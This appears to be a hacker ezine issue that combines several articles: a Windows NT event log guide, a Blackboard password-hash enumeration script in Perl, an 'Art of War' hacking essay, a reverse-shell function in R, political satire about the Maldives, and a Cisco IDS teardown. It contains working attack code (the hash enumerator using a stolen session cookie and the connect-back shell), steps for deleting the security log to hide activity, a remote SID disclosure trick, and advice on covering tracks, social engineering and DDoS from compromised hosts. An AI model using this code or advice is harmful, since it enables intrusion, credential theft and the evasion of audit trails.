ACTION
If the service normally accepts this command, try typing it
again later.
----------------------------------------------------------------------------
LOGS TYPE
=========
The three types of NT event logs are:
System log
----------
Tracks miscellaneous system events, e.g. tracks events during system startup
and hardware and controller failures.
Application log
---------------
Tracks application related events, e.g.applications generate informational
such as failing to load a DLL will appear in the this log.
Security log
------------
Tracks events such as logon, logoff, changes to access rights, and system
startup and shutdown.
By default like i said you will see later in this paper that the security
log is turned off by default.
LOGS LOCATION AND ENABLING
==========================
The location of NT logs is :
%SYSTEMROOT%\system32\config\SysEvent.Evt
%SYSTEMROOT%\system32\config\SecEvent.Evt
%SYSTEMROOT%\system32\config\AppEvent.Evt
By default NT DOES not log all the event.You have to enable auditing, to do
so follow these steps :
1- From the Start Menu, choose Program and then Administrative
Tools (Common). From the Administrative Tools submenu, choose User
Manager,
which displays the User Manager window.
2- From User Manager Menu Click POLICIES then Click Audit, the Audit policy
windows appeare
3- Select the Radio Box "Audit These Events"
4- Select what you want and Click OK and Close User Manager :)
NOTE: If you decide to Audit all event you better HAVE SOME KICK ASS MACHINE
cause this is going to suck a lot of resources
Auditing of Privileges
======================
Certain privileges in the system are not audited by default even when
auditing on privilege use is turned on. This is done to control the growth
of audit logs. The privileges are:
1- Bypass traverse checking *** To Rveryone ***
Is granted to everyone so is meaningless from auditing perspective
2- Debug programs *** To Administrators ***
Not used in a working system and can be removed from administrators group
3- Create a token object *** To NO One ***
Should not be granted to anyone
4- Replace process level token *** To NO One ***
Should not be granted to anyone
5- Generate Security Audits *** To NO One ***
Should not be granted to anyone
6- Backup files and directories *** To Administrators Backup Operators. ***
Used during normal system operations
7- Restore files and directories *** To Administrators Backup Operators. ***
Used during normal system operations
To enable auditing of these privileges, add the following key
Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: System\CurrentControlSet\Control\Lsa
Name: FullPrivilegeAuditing
Type: REG_BINARY
Value: 1
Or Create a text file call it audit.reg and cut and past the lines below
-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"FullPrivilegeAuditing"=hex:01
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .Reg file Or you double click on it or you open a command
prompt
and you type : REGEDIT /S audit.reg
This will merge the file you have created
Auditing Base Objects
=====================
This registry key setting tells Local Security Authority that base objects
should be created with a default system audit control list
Still the administrator will need to turn auditing on for the
"Object Access" category using User Manager
To enable auditing of base objects, add the following key
Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: \CurrentControlSet\Control\Lsa
Name: AuditBaseObjects
Type: REG_DWORD
Value: 1
Or Create a text file call it auditObj.reg and cut and past the lines below
-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa]
"AuditBaseObjects"=dword:00000001
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .Reg file Or you double click on it or you open a command
prompt
and you type : REGEDIT /S auditObj.reg
This will merge the file you have created
EXAMPLE
=======
What do you see when you enable Security Auditing ?
IN THIS EXAMPLE I DID ENABLE ONLY LOGON LOGOFF FAILURE ONLY
Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL
CLEARING NT LOGS
================
To clear a log, switch to the log you want to clear, on the Log menu click
CLEAR ALL EVENTS a message asks if you want to archive the current events.
If you answer Yes, the SAVE AS DIALOG box appears.
Enter the filename and folder path where you want to store the saved logs
After you answer Yes or No, Event Viewer empties the current log.
Only new events will appear in the log.
NOTE: When you clear the SECURITY LOG an event will SHOW in the Security log
Even if you clean the log you still see this entry :
The audit log was cleared
Primary User Name: SYSTEM
Primary Domain: NT AUTHORITY
Primary Logon ID: (0x0,0x3E7)
Client User Name: WaKiNg
Client Domain: BRAINCELL
Client Logon ID: (0x0,0x2581)
This entry mean you cleared the security event log.
Now if you want to clean the log well you can do the following :
1- Open control panel and then services
2- Locate EVENTLOG service and Click the STARTUP button
3- In Startup Type choose Manual Or Disabled
4- Restart NT
5- Go to %SYSTEMROOT%\system32\config\SecEvent.Evt and delete SecEvent.Evt
By doing so it will stop the eventlog service and you can then delete the
log you are interrested in. :)
TOOLS TO MANAGE NT LOGS
=======================
I use Dumpel.exe from NT resource KIT i am an Old dude who love cmd line :)
If you like cmd line i suggest you Dumpel.exe if not see the links below
And I use NTLast from ntobjectives
Here is an example of what Dumpel.exe will report :
DUMPEL Usage:
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t]
[-d x]
-d <days> Filters for event last days (number larger than zero)
-e nn Filters for event id nn (up to 10 may be specified)
-f <filename> Output filename (default stdout)
-l <name> Dumps the specified log (system, application, security)
-b Dumps a backup file (use -l to specify file name)
-m <name> Filters for events logged by name
-r Filters out events logged by name (must use -m too)
-s <servername> Remote to servername
-t Use tab to separate strings (default is space)
-c Use comma to separate fields
-ns Do not output strings
-format <fmt> Specify output format. Default format is
dtTCISucs
where
t - time
d - date
T - event type
C - event category
I - event ID
S - event source
u - user
c - computer
s - strings
NTLast v2.85
------------
http://www.ntobjectives.com/ntlastv2.htm
Is specifically targeted for serious security and IIS administration.
Scheduled review of your NT event logs is critical for your network.
A server breach can be uncovered by regular system auditing.
Identifying and tracking who has gained access to your system, then
documenting the details is now made easier with NTLast.
This tool is able to quickly report on the status of IIS users, as well as
filter out web server logons from console logons
EventReader
-----------
http://www.strongsoftware.net/eventrd/
EventReader(TM) is an administrative tool which allows network
administrators to analyze and manage event logs. The program lets you
collect event logs from Windows NT computers in a network and store the
information in one or several ODBC compatible databases
(Microsoft SQL Server or Microsoft Access). You can designate the computers
from which to collect the information, and assign a schedule and data
collection and event log backup parameters. The installation package
includes
a Microsoft Access sample database, which contains many queries and reports
for effective event log analysis.
Event Archiver Enterprise
-------------------------
http://www.eventarchiver.com/download.asp
Event Archiver Enterprise is one of the easiest to use products in the event
log management market, and stands above the others with its flexibility.
We think of it as a "set once, run forever" application that saves your
organization considerable time and money. Given the average hourly cost of a
Windows NT/2000 administrator, deploying Event Archiver Enterprise greatly
reduces your organization's TCO. After installing Event Archiver,
administrators can start analyzing event log entries instead of just trying
to save and store them regularly
EventReporter Version 4.0
-------------------------
http://www.eventreporter.com/en/
Version 4.0 provides a number of important enhancements:
Support for message delivery via email
Client added - a graphical user interface for customizing EventReporter
Filtering of events based on severity code (e. g. error, warning,)
Greatly enhanced documentation
Greatly enhanced web site - especially support area
Remote Viewers - Event Log Monitor
----------------------------------
http://www.tntsoftware.com/products/emon22/viewers.asp
The Remote Viewer for Windows PC runs on
Microsoft® Windows 95, Windows 98, Windows NT
Let you search and display event log information as it is received by the
console. Receive user selected real-time Alerts from the console which are
immediately displayed in the Remote Viewer.
Provide remote management for processes, services, and device drivers
Provide remote search, edit, create user defined notes and message reference
Provide multiple remote command prompt windows
SECURITY ISSUE FOUND WHILE I WAS WRITING THIS PAPAER THE BUG WAS NOT OUT YET
============================================================================
To the one of you who know the SID in NT and the tool "sid2user" that allow
you to get the SID of the users .
Well I found a way to get the SID even Administrator Remotly if you certain
conditions are meet:
1- By default NT logs can be viewed remotly :)
2- If you have Audting Enabled
3- If your policies Block The account after certain failure count.
Now here is what you need to do to get NT Spit out the SID
----------------------------------------------------------
Try to login to the remote box using any exisiting account and the box
you will get a logong failure and in event viewer you will generate an
entry
Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL
If like I said you have a policy that block an account after certain count
You will you see this entry in your log file.
ser Account Locked Out:
Target Account Name: WaKiNg
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
Caller Machine Name: \\BRAINCELL
Caller User Name: SYSTEM
Caller Domain: NT AUTHORITY
Caller Logon ID: (0x0,0x3E7)
So now if you connect to the remote EVENT box using event viewer you will
be able to see the logs and you will see the SID
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
I did not do any other research into this cause the objective was not to
find something but it was to write this paper :)
===============================================================================
Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
-----------------------------------------------------------------
Live Well Do Good, Accept no limitations --:)
================================================================================
--------------------------------------------------------------------------------
[Blackboard 5 Password Enumeration]==================[Case <phric@legions.org> ]
--------------------------------------------------------------------------------
#!/usr/bin/perl -w
#
# Blackboard 5 md5 password hash enumerator
# By Case (phric@legions.org)
#
# Original idea and about 2 lines of code from
# pedram amini <http://pedram.redhive.com>
#
# USAGE: ./bbview.pl <host> <starting hash seq.> <session id>
#
# ex. ./bbview.pl blackboard.bob.com ab \@\@38763287429gd873hd7
# make sure you escape the @ in the session id with a \ like above
# to use goto login->preview on blackboard site the in netscape
# tasks->Privacy & Security ->Cookie Manager get the session id from the cookie
#
# You must also enumerate the user_id if not known
# using the same technique accept all characters instead of just hex chars
# or you can try just guessing it as first letter of first name + last name
# the 'by' variable in the query is the database variable to extract for the
# user id set it to user_id
#
# should enumerate the md5 hash which you can crack fairly simply just might
# take a bit
#
#
$session_id = "$ARGV[2]"; # current valid session id.
$host = "$ARGV[0]"; # target blackboard server.
@chars = ('0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', 'a', 'b', 'c', 'd', 'e', 'f');
$password = $ARGV[1];
$num = 0;
$f = 1;
for($x = 0; $x < 16; $x++) {
if($f) {
$pass = $password.$chars[$x];
}
else {
$pass = $chars[$x].$password;
}
$url = "http://$host/bin/common/search.pl?action=RESULTS\\&context=USERDIR\\&type=SEARCH\\&operation=VIEW\\&keyword=\\&keywordraw=$pass\\&by=passwd";
print `curl --cookie session_id=$session_id $url >stuff.html `;
$bytes = `wc -c stuff.html`;
if(!grep(/6[0-1][0-9]/, $bytes)) {
print "Adding $chars[$x]\n";
`cp stuff.html user.html`;
$password = $pass;
print "$pass\n";
$x = -1;
}
if($x == 15) {
print "Going the other way\n";
$f = 0;
$x = -1;
$num++;
}
if($num == 2) { print "$password\n View user.html for user \n"; die; }
}
die;
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[The InfoSec Art of war]===========================[Mark <mark [a] vulndev.org>]
--------------------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/*
* Author: Mark - VulnDev
*
* Why: Because someone had to. (Again)
*
* Following the orginal publication of my document a number of
* "similar" texts appeared both publish and online.
* I would like to briefly thank those magazine editors who were
* Extremely helpful.
*/
The application of the art of war to the "Underground".
There are 13 main sections to Sun Tzu's Art of war,
what I propose to do in this document is to relate what I see as the
most
fundamental parts to the "Underground" and the security community at
large,
it is by no means a complete psych 101 on the subject, just my
thoughts.
I had actually proposed to do a relation of Taoist principles to the
Underground and "Hacking" however the more I looked into it, and had
more
understanding of an alternative belief, the more I realised that
actually being
a Hacker/cracker/phreaker/Pain in the arse, is actually not really
inline with
the required psyche for a taoist.
If "we" accept things for what they are without question we would not
question
Microsoft, we would not develop and publish exploits or code,
applications or
theories, and we wouldnt have need to write this or any ezine.
(some would say thats a good thing!).
I do use a generic "him" in this document, however ofcourse if your
female you dont
need to get a sex change to read this, just s/him/her/;
**
MOST IMPORTANTLY I DO NOT ENDORSE, CONDONE OR IN ANY WAY ENCOURAGE
ILLEGAL ACTIVITY,
I BELIEVE PEOPLE CAN THINK FOR THEMSELVES. (Foolish I know.)
**
Let us proceed.
1) ** Estimates **
Moral Influence:
At some point in our lives we are all affected by Morality (or in
some cases, lack of it),
however this is much more about who we trust, what we believe in and
who we follow.
All groups have a founder, or founders, subsequent members to that
group have to follow
these persons, respecting them as knowing more about XYZ than someone
else.
What Moral Influence should be used for when working in security is
making sure the leader
has control, but also has the trust and faith of those under him,
maybe by making them not
feel as tho they are under him but beside him. Ofcourse, a skillful
leader will also allow
his "troops" to see him leading them in to battle, and willing to die
for the cause, when
maybe he's stood behind them watching.
Weather:
Sun Tzu meant this factor as operating in regard to Natural Forces
and seasons, and I see no
reason why the community cannot react similarly, infact it does. It
is true, on holidays and
weekends there are fewer people in offices, and so fewer people to
notice when things go wrong,
alot of SOHO companies, especially with the advent and availability
of BroadBand,
run their servers and leave them on 24/7, maybe during the week
someone is watching,
however on sundays?
So a moral aspect of leading a campaign or defending against one is
making sure you understand
your own seasonal habits.
Terrain:
"...I mean distances, whether the ground is traversed with
difficulty,
whether it is open or constricted, and the chances of life or
death..."
If you don't understand this easily im surprised, however here we go,
when you are picking a
"fight" you need to understand the distances, the avenues of attack
and where you can defend your
flanks, this is not just true accross the internet, sure everyone has
a few shell accounts up their
sleeves for those "special" occassions" however watch your "group"
monitor the weak spots and remedy
them, do not leave yourself open to attack.
If you take your laptop to a convention, if you can securely move
your code, 0days, whatever ahead
of time. An encrypted filesystem image that you can restore when
arrived is safer than having things
which may not be useful to be publicised before an event. Bearing in
mind when asked by airport security
what version of windows you have, trying to explain that you dont
have windows and their software to look
for XYZ "won't work", is always amusing.. so i hear...
Command:
not: rm -rf /
Command looks at the leader, whether he would put his neck on the
line for his "troops".
If he cares, or if that hand shake actually distracts from the knife
blade poised behind your back.
If the leader is not equipped to lead, he should not. Leadership is
not something that can be learnt,
it is something intrinsic, something natural and something which
above everything else will define
success or failure over any space of time. It is easy to see the
groups of "hackers" who get together,
form websites, sell out when they are older.. and then fire people,
lets say, mudge, for example,
who have done more for a company than anyone else. What kind of
leadership is that in someone who
gets rid of one of the founding links.... there may be reason, but
reason hidden in shadow is no
reason at all.
Doctrine:
Utilising the resources you have, knowing who your strengths are, and
how to build upon those strengths,
have you got too many layers of command to actually have a point in
having those layers at all,
look at cyber[B]army, full of a certain kind of individual who is
willing to use children to view
illegal websites because
"They won't be prosecuted or jailed" because they are below the legal
age of an "adult",
that person knows who he is (dont you MrYowler).
If you can get the organisational heirarchy right, you will succeed,
if not, change your paradigm and start again!
2) ** Waging War **
When at "war", have a good spread of people with you, with their own
talents, as mentioned before.
No war is best fought over a long time, be swift, get in and get out,
leave no trace on the "land"
that you have been there except for the objective being completed.
You should not need a second front,
you should be able to complete the objectives with the first stand.
- -- But what the hell does this
have to do with "I" you say.. well, If you have to spend a week
solving an intrusion then your screwed,
if you spend a week solidly probing, probing again, trying to get in,
failing, making a mess, leaving
log trails and then succeeding, you have probably left enough
evidence behind for you to be justas screwed.
If you have to go back to cover your tracks after you've been in, its
probably too late.
Equally if you
have to get a third party in to do the role or an
aspect of a role which you should do,
there is going to be uncertainty over your position as an employee me
thinks.
Do not let yourself get overly confident, if you do, you will find
yourself making mistakes.
Do not let your other associates have a free roam if it's in your
"name",
they should stick to what they have been assigned, no more and no
less.
It is for the leader to patch the holes that may be caused with
projects.
Finally, "Treat the captives well and take care of them"... Self
evident really,
do not cause un-needed destruction, or damage, that is not what it is
about and it just means
the BBC and CNN are able to use destruction as evidence for "Hackers
being evil",
when we all know its "HaX0rs" who are evil..(*ahem*)
3) ** Offensive Strategy **
No this doesnt mean that you need to be offending people through your
projects.
What Sun Tzu wanted to get accross is that you should capture your
objectives without
destroying them, as if they are destroyed they are useless to you. In
war, as can be seen
in the recent Iraq conflict, if you take out parts of the critical
Infrastructure and other
methods of state control, you end up having to rebuild an entire
country.. If you take control
of a network, there is little point patching their cisco router's IOS
to send everything to the
great void of an non-existant IP.. as you will have lost
functionality of your newly found gains.
Having partaken in many wars and won is not the mark of a good army,
to win without the war,
that is what prooves the level of skill involved.
This can mean having to be pre-emptive on specific targets which,
when neutralised,
minimise the enemies ability (see Iraq).
In a war there are a number of key things to consider, firstly you
must target the
enemy's strategy, by knowing him, thinking how he thinks and
understanding the opposite side,
you will be able to stay ahead of his strategy, a failing example in
the fact of selling out
would be the honeynet project. More successful examples of thise
tactic
will become apparant over the next few years. iDefense may not get
excluded from these tactics,
only time will tell.
Next disrupt his alliances, this is self evident, if you can isolate
the target then there
is less likelyhood of you ending up surrounded by people friendly to
the target.
Attacking the troops from the other side is a less preferable but a
perfectly possible
method for war's over the internet and is evident in wars over the
physical plane.
The worst plan is attacking "cities" and the infrastructure (see
above).
Understand the uses of large and small forces, if you only need two
or three people to meet
an objective, do so. If you know you need to blast the target off the
map.. do so
(although thats hardly elegant). The last point that I am going to
mention regarding the
offensive strategy is that delegation is key, if a leader tries to
control the situation
that he is not part of, it can result in disaster, choose your
decision makers in the "field"
carefully, but trust their judgement and do not undermine them or you
may face mutiny.
In my opinion the following is the most important message to come out
of the offensive section:
"if ignorant of both yourself and the enemy you are certain in every
battle to be in peril."
Know your target, but at the same time, know yourself, if you do not
know yourself
you will never reach your full potential.
Common sense folks, google is the greatest invasion of privacy that
is readily available to the public.
USE IT! piece together those banner grabs, usenet posts and the like,
build the profile on the target,
then hit it hard and in the correct place.
If you think you can win, you might. if you KNOW you will win, you
will.
preparing the very best defences, to make yourself invincible does
not mean that you will win,
it just means that you wont be defeated.
There is no point sitting behind an "inpenetrable" network setup if
your target has the same setup,
you will both be able to attack, but neither will be able to get past
the walls.
"Invincibility lies in the defence, the possibility of victory lies
in the attack"
If you aren't interested in attacking, barricade yourself behind
rock,stone, everything you can..
you will be safe.. but you will not be able to repel the attacker,
just allow them to keep attacking,
therefore you will not win and they will not lose.
If you situate yourself in the "sky" all around, in hundreds of nodes
accross the internet for example,
you will be fairly safe if one is taken offline by a counter attack,
AND you will be able to launch a massive attack upon the target who,
unless they have the ability to take out all of your nodes will still
find themselves under attack,
so who wins? not the counter attack, they are still being threatened.
(ie SOME .gov's)
This is true for internet worms and ddos'.. no-one has won against
codered and similar worms yet,
it is still there (see $LOG/apache/access_log), they just seal
themselves in.
However, if you find yourself in prison/fired/dead and the attacks
you started are still going,
you've lost in a pretty major sense, or alternatively to have an
attack that stays in proliferance
after death could be seena s very much winning..
If you are a leader, instill confidence in victory into your troops
and they will be unstopable.
To have a large force of people, is the same, from a command point of
view, as having a small force,
it is a matter of the right groupings of the troops, the right and
accurate signals and the ability
for those under your command to be able to react as expected to the
given command or signal.
Sun Tzu tries to get at the fact that you should use your most solid
"core" to attack the weakest
"void" in the enemy. (cracking *) This makes utter and total sense if
you are trying to penetrate
the walls of a city, go through the sewer outlets, the drains, target
the areas around windows,
letter boxes, any "hole".. and ofcourse when applied to a network,
target the dialup server,
the engineer sat in the bar next door who is happy to talk about the
"bastard" management,
who will be happy to help you out with some "difficulty" your having
with your laptop or something,
infact "why not bring it round to <his> place and <he'll> have a look
at it"..
use your resources wisely, if you need to conserve bandwidth as you
are still on a retarded 56k line,
dont try to flood someone as most SOHO's have more bandwidth.. get
access to someone with the bandwidth
you need.. ssh and telnet are VERY low bandwidth usage applications
which can command a much greater scale.
How else would "hackers" in Indonesia, for example, be able to knock
people offline from their 56k lines..
getting access to say, a server in *.kr, where there is bandwidth.
Do not start an attack with your best -(sizeof(lifetime) *
(sizeof(day))exploit,
there is a potential for some anal retentive such as Spitwad (a la
"Honeynet"..)
with funding from say.. the NIC (www.cia.gov/nic), to be watching
you...
if you sense something isnt right, wait and look for more holes, and
the screaming
obvious things that may not fit... (Or throw packets (!TTL) at it if
you
think it's honeyd..)
"When the strike of a hawk breaks the body of its prey it is because
of timing"
I think this can be quoted along side "Only fools rush in" and "he
who hesitates is lost".
enumerate
wait
enumerate
compare
decide course of action.
however, do not solely rely upon your situation to decide when to
attack or how to defend.
Use the 5 aspects mentioned in the first section to aid decision
making.
Bring the enemy to you, if you control the entire network, make the
enemy think you only have
a solitary host,m and draw them in, gather what you need (as they
will not expect that the
router they use is also controlled by you.. if not strictly legally,
but in some cases,
perfectly legally), and from there you will have an advantage.
"against those skilled in attack, an enemy does not know where to
defend;
against the experts in defense, the enemy does not know where to
attack."
regardless of how you go about your project, do not leave a trace,
it is sloppy to do so. (and saves too much worry).
"When I wish to avoid battle I may defend myself simply by frawing a
line on the ground;
the enemy will be unable to attack me because I divert him from going
where he wishes"
it makes sense doesnt it.
they want to attack your webserver, however all of the packets go via
a router,
to a packet filter, then inbound, via your IDS and other intrusion
resiliancy tools,
to the webserver.. the enemy cannot get a direct line,
hence cannot attack anywhere you do not enable them to do so.
Try to stay ahead of the enemy, shift your angles, make them think
your looking at one
aspect when really you are watching them seeing you do so.
When you do so however, do not wait for long durations unless you do
so for a
tactically sound reason, to confuse or hinder.
If you have advanced through a land in a matter of hours and suddenly
you pause,
through no reason but your own, you will confuse the enemy, if you
pause because you have
run out of XYZ.. they will act to cut the resources off.
**
The basic moral is be sensisble, if you have to take risk, do so.
However do not be afraid to sit your ground.
Play mind games, not only are they fun, but admins hate not being
able to control things
in their network or their "domain".. if you suddenly divert all calls
from X to H and leave no trace,
and change it back every time the admin thinks he has sorted the
problem out
you will stress them out and have an upper hand.
Look at how groups such as PHC, Bugtraq or Gobbles have affected the
"scene".
They are absolutly brilliant, have mastered how to intimidate those
"scene wh0res" who
try to look "big and clever". They don't intimidate (to my knowledge)
with threats,
rather with sheer brilliance of code. They seem to understand just
what we were (and should still be)
about.
If you are defending, change the values that the enemy is getting on
scans and banner grabs,
they wont know what they are doing.
Don't use this information in a manner which negates the time I have
spent writing it,
I know there are people interested in what I have raised,
and if your not, well you didn't need to read it did you!.
I have attempted to provide an angle for thought,
this will be (still) an ongoing document, available wherever
mirrored.
yours,
Mark
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQPJuCoOWKXnEnFgCEQLGagCgvVcBeYp4ZmzDs6t9/q+E4DPb4NwAoOFV
i+Sz+B1G7/kgD7AXPdxQX9Px
=Qwxn
-----END PGP SIGNATURE-----
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Connect back shell in R]=====================================[xonox@b0rken.com]
--------------------------------------------------------------------------------
[The author does not wish to educate people on the eliteness of R so there is
only code - Ed.]
--------------------------------------------------------------------------------
netshell <- function(myport = 12345, backconnect = FALSE, myhost) {
if(backconnect)
s <- make.socket(host = myhost, port = myport)
else
s <- make.socket(port = myport, server = TRUE)
on.exit(close.socket(s))
write.socket(s, "R netshell() (c) 2004 by xonox")
repeat {
write.socket(s, "\n> ")
c <- read.socket(s)
if(c == "") break
r <- paste(system(c, TRUE), sep = "", collapse = "\n")
write.socket(s, r)
}
}
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Insight into non-repressive governments]=============================[The Barn]
--------------------------------------------------------------------------------
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
The Barn presents it's insight's into democray:
For any mail please send to archimedes@legions.org to forward to us.
************************************************************************
Non-Repressive Governments.
************************************************************************
Now we at The Barn aren't the type of people to get political[1],
however we do find that occassionally some things have to be brought to light,
therefore we have created this little article detailing in approximate terms
the conversation had via the Barn's Bat-phone with a member of the
Presedential Team from the Maldives.
No other lovely nations will be discussed in this article, neither will
we be writing about any country in the future.
(with the possible exception of: The French for their fscked laws).
We aren't going to say anything about Romainia wanting into the EU so
cracking down on highly ammature computer kidiots.[4]
Instead we rolled a dice and came up with a hairball (Hackers Against
Hairballs would be mortified) and in the process of coughing it up the phone
rang and subsequently this is where we are, sun bathing under a few storm
clouds with an electric heater that doesnt work and an attempt at thid world
debt for a bank balance.
The Maldives, and island nation with more sand than you can shake a BIG stick at,
where roughly lots of the GDP comes from tourism (See CIA world fact book for
info we don't really care).
OK, it's a paradise, palm beaches, white sand, government sponsored beatings,
the works.
Here are a few more choice facts about the lovely island paradise of the Maldives:
It's main religion: Irrelevant, this isn't about religion.
It's employment records: Irrelevant.
Palace Telephone Number: +960771177 [ Doh. caller ID. ]
What more can you ask for?
Internet Connectivity, and that's what this is all about!
Yes indeed folks, the Maldives is 'connected' to 'da web'.
We all love freedom, and what can be more free than the people in a nation
where when the elections come round riots take place, buildings burn and
people acting on behalf of the government describe the riots as "grossly
blown out pf propotion"[5] and subsequently the BBC is accused of trying to
interfere with the elections.[6]
Well, some people seem to think that this non-repressive democracy isn't all
the orgasmic experience that other people see[7].
So what do they do? In this great democracy they set up a website, which
speaks out against what a substantial(remember, SUBSTANTIAL)
group of people feel to be a repressive *gasp* regime.
And do you know what? they say that maybe the place isn't so great[8]. This is a
basic Human Right[9], Freedom of speech (ok, ignore any disprooving points
please)
These people speak out, against ole' President-kins and do you know what?
"No, what?" Mr Pres. doesn't have the testicular presence to leave them to
themselves and allow them to have an opinion.
[ A few days later back at the ranch]
"We want them to realize that just because they have Internet access doesn't
mean they have a free reign to do what they want".[5]
I am so glad to see that democracy is well upheld, the Government of the
Maldives care's SO much they don't want anyone to risk getting hurt[10].
"..redirect it and point to the president's website".
They care about their public image so much that they think more people
should be able to see how great the country is by reading Mr Pres.'s web page.
Isn't that just so great of him! The only minor issue could be the fact that the site
in question doesn't belong to the Government.
"It's a handful of people who are just causing trouble, nothing important"
Well, thankyou Mr Presidential aide, It's good to know that your reassuring
the public to the fact that the island's are perfectly safe for your oh so
small tourist industry[11].
"Ofcourse it would mean that you could stay at the palace and could be good if
ever you need to have a break."
So by redirecting a webserver one can not only get themselves a potential
25 years imprisonment under terrorism charges (if it makes it to trial) but
you can also get a cushy number playing with Government 802.11b facilities[12]
just like the presidential aide has.
Funnily enough the aide didn't seem to happy with the idea of:
"no problem, just send us the request in writing".
To conclude.
The Maldives: A great place to stay if you can avoid anything to do with the
place.
However if you are happy to fund the state's repression of it's people we
highly recommend that you visit. Maybe take a laptop and wireless card with
you.
I mean, if you want the details of the person who spoke with us
(who happens to live in London, England and spend ALOT of time abroad)
We don't mind answering questions to a few choice persons/reporters.
You know who you are.. and so do we.
References:
[1] With the exception of the times we do.
[2] Sour Germans
[3] Watch out for "Romainians flushed with New laws" coming soon.
[4] TESO Pictures on request.
[5] Anon.
[6] Not that anyone ever fiddles elections do they George?
[7] On screens in hotel rooms, just speak to reception.
[8] Think about how people love AOL.. thats right, well done. Not the Grass is
always greener theory either.
[9] Can't find many current successes on the Human Rights front I'm afraid.
[10] In a "he fell over but just happened to have a hole in his head." kind of way.
[11] Until /bin/laden works out how to melt ice-caps.
[12] The first War-Walk of President's palace gets a "I'm uber" T-Shirt
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Snorting Cisco]=====================================================[DigiEbola]
--------------------------------------------------------------------------------
Cisco Secure IDS 4210
-------------------------------------------------
Intel Celeron 566 MHz
512 MB RAM
AMIBIOS
1 PS/2 Mouse
1 PS/2 Keyboard
2 USB - Intel Corp 82371AB/EB/MB PIIX4
2 Ethernet - Intel Ethernet Pro/100
2 Serial Ports
1 HD15 - ATI RAGE XL
1 1.44 floppy
1 Atapi CDROM
1 IDE Drive - 18 gig whatever
Initial Build: Redhat
I hate Cisco IDS. I hate it, I hate it, I hate it. It is truly a pile. Let
me give you a bit a background. I am a Open Source advocate by nature, and have
been running Debian since version 1.0/1.3. I can utilize lots of different
types of UNIX and Linux, but Debian is my favorite. Naturally, I try to deploy
as many Debian machines as possible inside a corporate environment, to prove
not only is it a very stable operating platform, but also easy
(read: cost efficient) to maintain. I have been blessed by the gods with a
Cisco Secure IDS model 4210, in which I will install my favorite configuration,
on the platform I hate the most. As well as being a Debian fanatic, I am also
into Snort IDS. Snort IDS is hands down one of the best network-based
intrusion detection systems available and its free. Cisco Secure costs way too
much money, and does not give a real network security analyst what they need
to make problem determination.
So, to bring you up to speed: I have booted the sensor, and it boots its
Redhat image. Redhat is such a pain, but it is better then Solaris x86, which
is what these things used to ship with. I am going to cut some corners and login
to this sensor, and steal hardware information, as well as old network variables
so I can place my creation into production as soon as possible.
Upon logging in, the root password is not what I was told. My boss, being the
busy man he is, is on the phone, in a locked office. I guess I will do what
I am known for doing: I will break the machine.
This is no big deal, as I have physical access. I will deftly grab my Debian
3.0 ISO, and slap it into the laptop-like ATAPI CD-ROM. I will power cycle the
sensor, which sounds like a 747 on crack, and watch the POST. Still waiting
for it to POST. Let me grab a redbull and get back to you...
Still waiting for it to POST. While I am waiting, I will reflect my thoughts...
I see absolutely no reason why what I am doing, should not work. The sensor
is a x86 architecture machine, with a Celery 566. It runs Redhat already, so
all we need to do, is install Debian, Snort, and add our secret sauce (which
is a trademark of me, and my skills in this particular niche of the computing
world.)
Ahhh, now the machine is booted, and the redbull tastes good. I am at the
Debian install screen, so please let me do some magic... *cough* bf24 *cough*
And the blue screen of life appears. What I will do now, is mount the drive,
and edit /etc/shadow, removing the root password, and we will be on our way.
Okay, I have removed the root password from /target/etc/shadow and rebooted
the system. Now we are posting... again. Please, if you are following along
at home, feel free to get yourself a tasty redbull...
Still posting...
Okay, back to GRUB... I prefer LILO. It boots. Now we get the green ANSI OK
checks, and soon, we will be back to a prompt. Congratulations, I have now
owned a Cisco Secure IDS sensor from the console. Child's play.
Okay the first thing I am going to look at here is lspci. It gives me a bunch
of junk that says INTEL PIIX4, which means, yes, its old, and very supported.
The video adapter is a ATI Rage XL, and the hostbridge is a 440BX/ZX/DX. This
will be a cake walk.
The kernel is a 2.4.18-5smpbigphys, which means that yes, it is very ownable.
Very ownable. Almost tragic. I am tempted to own the machine from the command
line just to say that I have. A check of the process list shows that this
machine has everything that a normal Redhat Linux box has, except that most
of the ps is listing processes owned by cids, the Cisco IDS software stuff...
We really dont care about that. What we DO care about is the network
configuration, which is propeitary to you, the dear reader, and essential for
me, as I have to have this thing back in the rack before anyone realizes that
its err.. missing. =)
So, I have just taken all the data that I need to complete my mission, so
I will reboot this machine, with my trusty Debian CD. Rebooting the sensor...
